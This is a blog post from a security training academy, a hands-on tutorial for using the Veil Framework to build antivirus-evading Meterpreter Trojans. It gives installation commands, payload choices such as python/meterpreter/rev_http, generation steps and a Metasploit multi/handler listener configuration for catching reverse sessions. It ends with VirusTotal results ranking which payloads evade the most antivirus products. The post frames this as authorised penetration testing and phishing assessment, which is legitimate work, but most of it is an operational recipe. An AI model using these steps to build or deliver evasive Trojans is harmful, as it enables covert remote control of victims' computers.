Have any questions?
(961) 76 108 669
info@semurity.com
RegisterLogin
SemuritySemurity
  • Home
  • About Us
  • Training Programs
  • Events
  • FAQs
  • Blog
  • Contact Us

    Evading Anti-Virus Software with Veil Framework

    • Posted by A.S.
    • Categories Blog, Hacking
    • Date January 7, 2018
    • Comments 0 comment

    Introduction

    During a penetration testing engagement, there comes a time where it is necessary to install a Trojan on the target’s system. Most often, the Trojan is sent through a phishing email to the target’s employees – as per the agreement during the pre-engagement meetings. The Trojan may be delivered by other means, like USB flash memory, shared folder, etc. Once the user clicks on the Trojan executable file, it connects to the pentester’s system where he is now able to control the target.

    Generally, there are different reasons why such social engineering task is conducted by the whitehat hacker – a.k.a., the security consultant; some of them are:

    • The whitehat hacker could not find a server-side vulnerability to exploit remotely and have a shell or a controlling session.
    • The whitehat hacker wants to gain access to certain systems belonging to key individuals in the target organization. That is, these systems are not servers, but mere workstations.
    • The target organization wants to assess the security awareness level of its employees.

    Despite the fact that there are so many Remote Access Trojans (RATs) in the wild, the Metasploit Interpreter – i.e., Meterpreter – is very efficient, effective, and powerful in accomplishing such task. Essentially, Meterpreter is a payload that is used while exploiting server-side or client-side vulnerabilities. It is the best and most developed payload among all payloads that Metasploit has in its arsenal. Given that the payload – whether it is Meterpreter or something else – is a bunch of machine instructions, there has to be a way to insert such code into memory and execute it. The payload itself is not a recognizable executable file. When the payload is delivered through an exploit, the exploit – as it is exploiting the vulnerability – will inject the payload into memory. However, in case there are not exploitable vulnerabilities, we cannot use the payload directly as a Trojan.

    Luckily for us, the Metasploit’s team developed a way to use the payload as an independent Trojan. And the way is to wrap the payload in a recognizable executable file template – like EXE. In this way, the EXE file can be delivered to any Windows system, get double-clicked on, and then get executed. Once executed, the template will insert the payload in memory and run it. The Metasploit’ tool that generates standalone executable payload is “msfvenom.” It can generate a standalone Meterpreter executable file, which we then deliver to our target.

    However, it is not so difficult for Anti-Virus programs to detect such file. The easiest detection method is to have signatures for the actual payload itself, i.e., Meterpreter, and for the executable template. Most AV products have signatures for these two components; and as such, we cannot deliver our Trojan – generated natively by msfvenom – to our target since we risk detection by AV.

    The Way of Evasion

    In order to evade AV software, two things are needed:

    1. The executable template – that is, the EXE file that wraps the payload – needs to be dynamically generated. Instead of having a static template, the template will be unique each time we generate the file. Thus, an AV software cannot have a signature for it.
    2. The payload – like Meterpreter – that is wrapped within the template needs to be obfuscated. Each time we generate our executable file, the payload within must be randomized or scrambled. Thus, AV cannot detect the payload.

    Did the Metasploit team implement such a way? Actually yes; however, they implemented it in the Professional (paid) version of Metasploit. And in Metasploit Pro, this feature can be enabled either from the web interface or from the command line using the module:

    /exploits/pro/windows/dynamic_exe

    Now, for those of us who use the open-source free Metasploit Framework, we are not left with no hope. Another platform was developed by a group of security researchers to accomplish the task of evading Anti-Virus, and that platform called “Veil Platform:”

    • Website: https://www.veil-framework.com/
    • Github: https://github.com/Veil-Framework

    Enter the Veil

    According to Github’s Veil page,

    Veil is a tool designed to generate metasploit payloads that bypass common anti-virus solutions.

    It relies on msfvenom to generate Metasploit payloads, then, it performs additional operations to dynamically create executable wrappers – or templates – and to obfuscate the payload so that AV won’t be able to detect it.

    When working with Veil, there are three components we need to understand in order in order to generate the final Trojan. These three components are:

    1. The Programming Language: Veil first writes a source code in a certain programming language; then, it compiles that code into the final executable. Veil supports multiple languages which we can choose in order to generate our Trojan. The chosen language makes a difference when it comes to AV evasion. We will discuss later how certain languages are more effective in evading certain AVs. The supported languages are:
      1. AutoIt
      2. C
      3. CS (C-Sharp/C#)
      4. GO (Golang)
      5. LUA
      6. Perl
      7. Powershell
      8. Python
      9. Ruby
    2. The Payload (Shellcode): this is the code that will be wrapped inside the Trojan. It is what is going to do our work, like giving us a backdoor. Given that there is one payload considered by security professionals – and the Metasploit’s developers – to be the best and most powerful payload, and that is Meterpreter, Veil has got this Payload the default payload. Veil gives you the opportunity to choose another payload of your liking.
    3. The Obfuscation Method: this is how Veil is going to hide the payload inside the Trojan. There are situations where there is no need for obfuscation to be done – as in the case of choosing Meterpreter stager (e.g., Reverse TCP, Reverse HTTP, Reverse HTTPS, etc.). The following are some of the methods implemented by Veil:
      1. Base64
      2. AES Encryption
      3. ARC4 Encryption
      4. DES Encryption
      5. Letter Substitution

    Installing Veil Framework

    Let’s move now to the practical side and see how we can generate those Trojans that ultimately will evade AV software. To start, you need to install the Veil Framework on your Debian or Kali Linux. The Veil Framework is available at Github:

    https://github.com/Veil-Framework/Veil

    And all you need to download and install it is to type the following commands on your Terminal:

    # apt-get -y install git
    # git clone https://github.com/Veil-Framework/Veil.git
    # cd Veil/
    # cd setup
    # sudo ./setup.sh -c

    Running Veil

    Inside the Veil directory, e.g., /root/Veil/, run Veil.py as follows:

    # ./Veil.py

    You will be prompted with Veil’s main window – shown below:

    It is worth mentioning here that the current version of Veil – 3.1.4 – combines two tools that used to be separate; and they are Evasion and Ordnance. Evasion is the tool for generating obfuscated Trojans (executable files), while Ordnance is the tool for generating shellcodes only (no executables). For the sake of this tutorial, we are mainly interested in Evasion. If we type the command list in the command prompt, we will get the following screen:

    And all we need to do now is choose the first tool – Evasion – by entering the command:

    use 1

    And we will get the main window of the Evasion tool:

    Understanding Veil’s Payloads

    As you can see from the previous image, there are 41 payloads in Veil Evasion. To see what they are, we can type the command list. The following image shows a section of the listed payloads:

    Each listed payload has three sections with forward slashes (“/”) separating them. The only exceptions are auxiliary payloads. Auxiliary payloads perform additional helpful functionalities; but they are not used directly to create a Trojan. The following is a description for each section of all other payloads:

    1. The first section indicates the programming language the source code will be written in.
    2. The second section indicates the actual code (called here shellcode) that will be embedded in the Trojan. If we look carefully, we will see there are only two types here: meterpreter and shellcode_inject. The first one, meterpreter, embeds a certain Meterpreter stager (see number 3) inside the Trojan. The second one, shellcode_inject, will allow you to embed any shellcode of your choice inside the Trojan. You can choose from Metasploit’s collection of shellcodes or insert your own custom shellcode. You can even embed Meterpreter using this type of payloads.
    3. The third section depends on the second one. If the second section was meterpreter, then, this section will indicate the type of stager – a stager being the code that delivers Meterpreter in real-time once the Trojan is executed – to embed. If the second section was shellcode_inject, then, this third section will indicate the obfuscation method to be used.

    Generating the Trojan

    We are going now to generate a Trojan using the payload number 26:

    python/meterpreter/rev_http

    Type the command use 26. The next screen will show you a description of this payload along with options that can be configured. Most of these options already have default values which we are not going to change now.

    The only option we need to set is the LHOST, which is going to be the IP address of our Metasploit system. The Trojan once executed on the victim’s machine will connect back to our Metasploit system so that we remotely control it. To set the LHOST parameter, we type the following command:

    set LHOST <metasploit_ip>

    After you hit enter, we are now ready to generate the executable Trojan. We type the command:

    generate

    We’ll be prompted to enter the name of the Trojan – e.g., “mytrojan” – as follows:

    When generating a Trojan using any of the Python payloads, you will most likely be prompted to enter the method of converting the Python code to an EXE file; the two available methods are Pyinstaller and Py2Exe. We will choose the first one (which is the default) in our example here. After that, once the EXE file is generated, you will be shown the location of that executable file as well as the source code:

    As you can see in the image above, the executable Trojan “mytrojan.exe” was written to the folder /usr/share/veil-output/compiled/.

    Launching the Attack

    Our job now is to send the Trojan to the victim – using any social engineering methods. However, before that, we need to setup our Metasploit system to listen for incoming connections on port 4444, which is the default LPORT. The listener can be configured within Metasploit console (msfconsole) as follows:

    msf > use exploit/multi/handler
    msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_http
    msf exploit(handler) > set LHOST <metasploit_ip>
    msf exploit(handler) > set LPORT 4444
    msf exploit(handler) > set ExitOnSession false
    msf exploit(handler) > run -j

    Once the victim user runs the Trojan, it will initiate a connection with our Metasploit system from which we can control the victim’s machine.

    Anti-Virus Strength Assessment

    I have generated two batches (rounds) where each batch contains 35 trojans using 35 of Veil’s payloads. And uploaded them to Virus Total (www.virustotal.com) to see which AV software detects which Trojans. The following are the results of both rounds:

    Round 1

    Round 2

    Veil’s Payloads Assessment

    The above experiment revealed that not all payloads have the same effectiveness when it comes to evading AV. The strongest payload that had the highest success rate in evading AV was:

    autoit/shellcode_inject/flat

    From the 12 AV products listed above, this payload evaded 9 of them.

    On the other hand, C payloads have demonstrated a very low success rate; they are the weakest of all payloads. And they are:

    c/meterpreter/rev_http
    c/meterpreter/rev_http_service
    c/meterpreter/rev_tcp
    c/meterpreter/rev_tcp_service

    • Share:
    A.S.

    Founder of Semurity Academy

      Abed is currently the founder and director of Semurity Academy, that is dedicated to offering training programs in white-hat hacking and cyber security. He has nearly 10 years of experience in the information security field. Previously, he was the IT security engineer at Consolidated Contractors Company (CCC) in Athens, Greece. He has spoken at different Computer Security conferences: RUXCON (Australia), Hack-in-the-Box (Malaysia), AthCon (Greece), and ISACA Leb. Chapter.

      Previous post

      How to Setup your Own Certificate Authority (CA) using OpenSSL
      January 7, 2018

      Next post

      The Essence of Buffer Overflow Exploitation
      September 21, 2018

      You may also like

      bitcoin-3411309_1280
      Web-based Cryptojacking Attacks
      19 January, 2019
      internet-1235106_1280
      How to Host an Anonymous Website on Tor Network
      14 November, 2018
      processor-540251_1280
      The Essence of Buffer Overflow Exploitation
      21 September, 2018

      Leave A Reply Cancel reply

      Your email address will not be published. Required fields are marked *

      four × four =

      Search

      Categories

      • Anonymity
      • Blog
      • Hacking
      • Pentest
      • Security
      • Uncategorized

      Latest Courses

      Network Whitehat Hacking & Penetration Testing

      Network Whitehat Hacking & Penetration Testing

      $750.00 $700.00
      Web Application Whitehat Hacking and Pentesting

      Web Application Whitehat Hacking and Pentesting

      $650.00 $600.00

      Latest Posts

      Web-based Cryptojacking Attacks
      19Jan2019
      How to Host an Anonymous Website on Tor Network
      14Nov2018
      The Essence of Buffer Overflow Exploitation
      21Sep2018
      Evading Anti-Virus Software with Veil Framework
      07Jan2018
      How to Setup your Own Certificate Authority (CA) using OpenSSL
      06Nov2017

      GET IN TOUCH WITH US

      If you have any question or inquiry, please do not hesitate to contact us by phone or email. We are always delighted to assist you and provide you with clear information about our training programs.

      Contact Details

      (961) 76 108 669

      info@semurity.com

      Company

      • About Us
      • Blog
      • Contact
      • Become a Teacher

      Links

      • Courses
      • Events
      • Gallery
      • FAQs

      © Semurity Academy by Supple Networks.

      Login with your site account

      5 × 5 =

      Lost your password?

      Not a member yet? Register now

      Register a new account

      16 + seven =

      Are you a member? Login now